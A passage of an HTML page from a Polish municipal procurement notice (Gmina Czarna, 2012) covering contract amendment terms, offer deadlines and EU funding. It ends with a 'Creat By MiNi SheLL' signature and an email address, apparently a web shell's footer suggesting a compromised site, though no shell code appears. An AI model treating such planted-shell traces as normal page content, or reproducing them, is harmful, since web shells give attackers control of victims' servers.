4)  wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ  na realizację przedmiotu zamówienia, w tym również zmiany stawki podatku VAT;
5) w zakresie kluczowego personelu Wykonawcy i Zamawiającego, za uprzednią zgodą Zamawia-jącego wyrażoną na piśmie, akceptującą kandydata na kluczowe stanowisko kierownicze,
6) w zakresie podwykonawsta, za uprzednią zgodą Zamawiającego: możliwe jest powierzenie podwykonawcom innej części robót niż wskazana w ofercie Wykonawcy.

5. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyra-zić zgodę. Nie stanowią one jednak zobowiązania do wyrażenia zgody.

6. Warunki dokonywania zmian postanowień umowy: 
     1)      inicjowanie zmian na wniosek wykonawcy lub zamawiającego, 
     2)      uzasadnienie zmiany prawidłową realizacją przedmiotu umowy,
     3)      forma pisemna pod rygorem nieważności w formie aneksu do umów</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gminaczarna.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Czarnej 37-125 Czarna 260 sektor B budynku.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.02.2012 godzina 09:00, miejsce: Urząd Gminy w Czarnej 37-125 Czarna 260 sekretariat pok. nr 10..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Regionalny Program Operacyjny Województwa Podkarpackiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com